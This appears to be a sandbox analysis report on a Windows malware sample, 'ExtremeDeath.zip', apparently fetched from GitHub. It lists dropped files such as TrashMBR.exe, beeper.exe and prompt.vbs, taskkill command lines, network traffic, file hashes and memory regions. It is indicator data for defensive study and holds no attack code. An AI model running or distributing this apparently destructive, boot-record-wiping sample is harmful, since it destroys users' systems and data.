"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe
PlgBlt.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseError.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseWarning.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 1 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe
MouseError.exe
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe
MouseWarning.exe
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe
MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 15 /nobreak
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7de1bbdc1f9cf1a58ae1de4951ce8cb9 |
| SHA1 | 010da169e15457c25bd80ef02d76a940c1210301 |
| SHA256 | 6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e |
| SHA512 | e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c |
\??\pipe\LOCAL\crashpad_4752_JPCQKRTQGDGAYMJZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 85ba073d7015b6ce7da19235a275f6da |
| SHA1 | a23c8c2125e45a0788bac14423ae1f3eab92cf00 |
| SHA256 | 5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617 |
| SHA512 | eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd0565ca1bc15c3cdee3f645a43daa82 |
| SHA1 | 0a556145a464093949dd3a90694b88be88f76950 |
| SHA256 | 20d21d592b9b7b3382d36d4717c01635ccdb018b579e234a5f4fe61a1468f55c |
| SHA512 | 52f6df9abbc9edf225ba6099565467649a9ed2db5ab3a6d2d3e32209a748895cc8754fc0694e2c59a8c7ba3c47b4659680529ef225458e8a97d75f27f3935ca4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e9b742bdb9b5a3148484d86a94739721 |
| SHA1 | a8b69e46de2f7cbfe7ad95f77a123acc33f6f890 |
| SHA256 | 2f832d05f7e203c0f2c47ae531a07f0e428eddde0e1232d7dbfb8992730c87a0 |
| SHA512 | b63907942a4bdaa5881f6f3bd30027977c9c5e7755cb3941a4142f5ad41e54e3132cfef9e881a21daec40098c21c55d12adc6952b0e5d71da8659331e17635f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9bcb8eceb0869a81a054253b67726477 |
| SHA1 | 964d51723d017c8cf2fe0f6343ccacb28293f64c |
| SHA256 | 2cebbddade6aeedfcf74439ac4656c895169075197e23793653f5a330682c0f9 |
| SHA512 | 097eff4f4abba15a0c55b294d65258212fd4d209f05fedbae1f8f97e40ba696f42c330abb55d0007f1bd703863ae2ef159d46dc15665d5de16acedb84aee5d82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ae283a281d9f20cf5818f913355ceaf1 |
| SHA1 | 344206680a874edbdeada13c8867d3d038f154a4 |
| SHA256 | 03026ab67080ebd38a5bcb0f9dfedaa7a32a822950d9efeca9c344a5d479736e |
| SHA512 | b476edc4e0d4135cdb36d835d9ac6e46537c78a4e3638f3a5be478cdd5e9c606abc2931711505ab0cc19f4078a38331c950e76176285906f023d9e0d9064d242 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fc3b8e7597c574eea5d963881a8b1ec3 |
| SHA1 | 532d6fab79f944003242bdccdb48a4987aa20382 |
| SHA256 | e5a2514f04eafdb94fab1e580db27a88113cf03f3852d205df04bea38a3ea38c |
| SHA512 | 8705064bf09275e1dc0cdc32dfaf5b1641c091d91c3e1a5adca28f3a150a4d620718210a0d5484bfffc3aa96538d8b9554e14899bd32228049f26a6d98a1b9a2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5846a9.TMP
| MD5 | f1ce6deb910909347731e775c0f43fed |
| SHA1 | 63b301ff7475181d29bac646cd838f5182465ee9 |
| SHA256 | 0705fca5ea3aea9b1d827a10ea60de22fd015e9d1e0918032d03a745c27a661e |
| SHA512 | bb0832fc412334d63a0bdb57a4f976c1cb0cdd868d4be55c0d97c536fa734908be1ad753760ca40f217b090d040c0a08a61dbfab1aed7475ee21d41ff2bc0a72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f7179997b8e39ebf65d205a6c7d04435 |
| SHA1 | 37be5740594d8970b77d925d17746ff0ab7d8ce7 |
| SHA256 | e0b6a05eed858001f45c53f1f76aa9302a262eef06916ebc3ae03e8409e3d419 |
| SHA512 | e7e7f175204fc40c1bebbbfe9e4bfd8f636f550bdd17d62d8a901abf0a6b86390fb1b13ba2b6a19fa1923b03a6fb4acc35aa0272712576be38eaa7754ad34359 |
C:\Users\Admin\Downloads\Unconfirmed 196939.crdownload
| MD5 | 2b4de576cc897dba5c6c9b7bab273bcf |
| SHA1 | 53f9cb004413cfc277878efe0c70a261ea7cd502 |
| SHA256 | 1e2796b060e7c4876df3b648ac7f55a19b0c03369eecc75616755f356753e867 |
| SHA512 | d96f721a0edecf38d50c8f4c40009769996d7a51a422c5b5d30469b06f5fa2b8b8d5e1650a15725a86c9d0cbe22e2c3732564d1c0ca2eeddfceb935a9c27df77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c3cef868397854b36b2e897ee6af5227 |
| SHA1 | a4ef9890ef725d3662e1773aebf779b1d8dd917b |
| SHA256 | 780253b01b82523edf6dcbec5147401597d22880512bd8cbeb4f6df9c8b5a921 |
| SHA512 | 04d60853fe1495ceb55e689a81c8a52274b2604d2c86e75fa297219f1fbcde930cc0c3b5c39d17bc21ac4e611dbdc0ef126b0e7008fc89153b9c6e5dabeb0af8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f93d2fe34122923bb5f3eefc0f6582d4 |
| SHA1 | 4ac825c0083d390be1c9e3331ca8040cdde9ff99 |
| SHA256 | 19367a94669b1b8c1d929cb3b316fc7e601c6dd87342c44e4684a59644c099ee |
| SHA512 | b68c04d3ea36d38ab7567a0fbc6b448f92fd2dd200b8a9e69175f9fd790a4c42615331869119c10bf3ae5a6f9cfe8760f45920fa2735755fa804eb98ae0805a7 |
C:\Program Files (x86)\Ethical Hacking Tools\EthicalHackingTools.exe
| MD5 | a37dfd1e12de84767e309638157b8510 |
| SHA1 | 73b74a0c3029d5786abb59fb1b72b526669f2f92 |
| SHA256 | 0400e0477789cf75be87eb7a7aef28a89d3f67f33381ce58318c273a5b91b5e2 |
| SHA512 | 5c6d807bde0119d10319fff335a04fb25d0bf5cc76ada410e8599ff0f6de887416e746ae67e4a54f91e148de9d75f5ee6d82a33d040cb2625207fa5caa0103c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ed5f4213c17629776cd75510648fc019 |
| SHA1 | ebfa685dca9b7c920cd5ad521c03e4ad0ce435b9 |
| SHA256 | e969795f0e63ec8a35cdf34d5bc43867ca0825bebfed9734943e69b34ed2ad87 |
| SHA512 | 71bcc166ae5a48f7a79aa5de7ecc7e10dce22c39240ca9ffe9d0f9340f40fc2a2429529cfee8b2b5d7082efe94921fa7df3454852d5313ff4093bfdffc189627 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6540120dca9043f4944b1912e082cbc8 |
| SHA1 | 2ebeab319ac2cbe7705d48236c65273d01b2c2d5 |
| SHA256 | cc1fcf891e1c78ac1985a1862c947e549fad25b9f1209b72414d956e31dadc3d |
| SHA512 | 208acdf0f9df5c8618b1771ddefca7288412e6e0e21ac394a82f36d1d860a9093eea8baef4ba9b992796f902865fc8aaf42f547c1d857534fdcd35f3bfc6967c |
C:\Users\Admin\Downloads\ExtremeDeath.zip
| MD5 | 80bf076cf31615750f7416d3bc7bb87f |
| SHA1 | 8b63084e104752100b0bdc9eb4d2ff9864557e90 |
| SHA256 | 8509174c6b51296ac8a43d08dc773c48fa10b86c9ff7095c4f80bba31966ea1d |
| SHA512 | 733374e03c4fe4345c2a6f8de500f62de5c9e5541561dd257d8ef004c3d12ab43797079c043be5896b8e5530735154deba3934dfd36ca9515feaeb4bb651ae34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2c5ad6fe24a8b12725323d3268fd6d35 |
| SHA1 | 7c725fe4e5eb30715b6c391afd530179828ffa12 |
| SHA256 | eeee5f721e81facdb91b4e5ef4a164556ec6ee4d4b280aaaafcb447a8fac08ad |
| SHA512 | bfdcd1793116e0ad2bb5a3ade226a73f2bf9b22fd651f946f01981840ff7cd4349c6dd88635372ee77669d530533870d9a855e038c1f6f313fb109b76d99d251 |
memory/4688-378-0x0000000000400000-0x000000000051D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\3000.tmp\3001.bat
| MD5 | 8c5dafc8fbd26dd529c25a01ecd5a51d |
| SHA1 | 839e962516258049a9e5e358dec7fe352e09d840 |
| SHA256 | 355785cc786eed7dffecfa7d33872f6de6baa833dce34598adf0d5c8688c00f6 |
| SHA512 | fda772a900c542eb59f4a94dc1eadec9677bb117e84a07c4e5c1afbf853704e6be4031383330f0dd88d2b48bbca973484c1e60ab3aa9424158f2c787e63de295 |
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\prompt.vbs
| MD5 | 709874d32bd68e69010acdf70cebf063 |
| SHA1 | feb94076246fe2fc902ef04d745fa0e60fe1497f |
| SHA256 | 1187be0f09aa0f917718064406e4595ac6137dd3a801e91ab2d7a03d98872da1 |
| SHA512 | bdb10baa9d02f9fff1b59e718a59c6c5a163d4a9d503fb2fe1767163fd3d746c01a7ca1546ad4febc25685d5a854635bc6170009db851a66853ce66d71d25526 |
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe
| MD5 | 42d06436fdc392a4e90d03623119fa87 |
| SHA1 | df9f007d438fc17fd47324b74a82d100a0763204 |
| SHA256 | 82f2e6b2cdad0ef859fe839c97bd7c0a34452638d49094979d7c0c4488b5c2ab |
| SHA512 | 52655cd83ab881c93c9076ad0d8a9b8ebeba37d6d2b00ebcf5a45f1e835463898aa22611445ff7505977cb8d8942e2f8b6a60706ec7eee494f7131ecc65e76c4 |
memory/1432-403-0x0000000000400000-0x00000000004D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\beeper.exe
| MD5 | 8d1a9c2e8d53425499f3a1853d2e0910 |
| SHA1 | 83962bce20d3f84b796486489e2c734afd1d0846 |
| SHA256 | 1d89bd45a36dd300a250292cacf22a7beff3cfe0dfddab0d7b77c3c260032131 |
| SHA512 | 81ba0b91f2fd0ba9b198c59ae7cc6115bf9b05c119ea46f37043a1981ef246c617fe6ba5590048b2e1383fb27c686b6eb75fdd6e642ea4433b404d0eaabf3950 |
memory/5036-407-0x0000000000380000-0x00000000003EA000-memory.dmp
memory/5036-408-0x000000001B0D0000-0x000000001B130000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe
| MD5 | cc72818ce44b3506b64b7f9a73d701bf |
| SHA1 | 041497924684e41aa671fe64acf6f980e0d9da7c |
| SHA256 | 48da69b9dfd600973ffcdba14abd88972ae51a5cae31b41d85ed56977f2b94dc |
| SHA512 | 4e3ad05ad99bd8c150ad99c8becca122613e446c678617f0a5a28e780706afe03580ec643956245e5e02d169e4f28bdf4f95b7d095d8e055517508c7dbeb0149 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e2db00e719830b020e30d6ec7c209220 |
| SHA1 | 1df358c165ab35493bde46b7a5dfc161d8106575 |
| SHA256 | 36b11265ae652762450fe63d37449652495496535c8e60a89ecfc916cdff6cec |
| SHA512 | 35f0a580ce974e63de6824b667801ad1a74add8d403129335553e32bdec5f53b36c5731d8da2b9e036d5be3fe557d66bd13b8f78edd565d6e4d72c6f3ed43638 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 367a1294db66be0840fbff95895dd5dd |
| SHA1 | 6ab2e1fea6a6d11a84df83591ceaa5ab1854a118 |
| SHA256 | 47fc32e02c72fffcf07eda347c578229295fd7c24aa3cfd3b141bc4d181f030e |
| SHA512 | fcb2cc2aea8594b3d49090566ae08a2642acf4b9a7839a6ca5ee63f7c843f3ca59904e808f09bca76a94e9dc0e290e07ca69c94d542cabc4fb0dfdfabe675a24 |
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe
| MD5 | ad241a26c7f536fdb0658d602a86fcdd |
| SHA1 | f862eecbac2d4afe4a437b77c6020b6de38b0671 |
| SHA256 | c3c6fe174f474e47b93e7aea1d0d77539d6880c3d84acac6412eff3393366dae |
| SHA512 | 5d8f9bd5d17a98b03adb4f0e173f011071708847748395889e7b582a25fc9f4606223415d9b61b3f82274a3addd73d86752bfba0bcb452990347f6b1439d672f |
memory/4688-435-0x0000000000400000-0x000000000051D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe
| MD5 | 92af619c1bdabf79c26bddda2556d9d0 |
| SHA1 | ac153eb6edd873abf6dcb6a0edbc9922d15e5dd1 |
| SHA256 | 72a5692d137571317f84287c4f2abb341b95173f9ee43901f6b3272bb1631e95 |
| SHA512 | 439855a8487f5cdd5ec195c303c85078af69c05ae28a837ff4d74d8e9f922a9556299b02b7bfdbe47f4287772604b21fe017ee49e0668022877a063771a37adb |
memory/448-439-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1356-452-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe
| MD5 | 5d8ff1dd3662ac09e5bfa682ffdb233e |
| SHA1 | c0ed5cfd5fa76db7087b4f25a806e124e29520af |
| SHA256 | 7cd320070e23e6582589d83f01f4da86ce0d1c0fe83d8df2007886c6ea10cc83 |
| SHA512 | d2258dda192a6a938989617aa46c33c0eabfae2a2d3284d3ac999b8d482ff2f08ffde836156ff341e51029d946f71ce77892b13a5924996b92a7773f2e123bb9 |
memory/448-456-0x0000000000400000-0x000000000041D000-memory.dmp
memory/512-457-0x0000000000400000-0x000000000041D000-memory.dmp
memory/1356-458-0x0000000000400000-0x000000000041D000-memory.dmp
memory/512-459-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2820-475-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2f267ac6045ac6faee52d6142b1c1b8d |
| SHA1 | 9a58e35b9ee591a6d696a78574de7c9f3b039b74 |
| SHA256 | 79f97994c424e28da64a3c13f3e871520fcd6daeb4cd8c1cace1c9cf3e493fee |
| SHA512 | 678322aa5cd38b3caa52fde403b5c870c1a9fb95dcf39af6cd277695f43c237d116cb2c73496eb410c1c5ab16158e79948c5a61fbe1b8523d9471fc4396c4b70 |
memory/1908-487-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4624-486-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2516-485-0x0000000000400000-0x000000000041D000-memory.dmp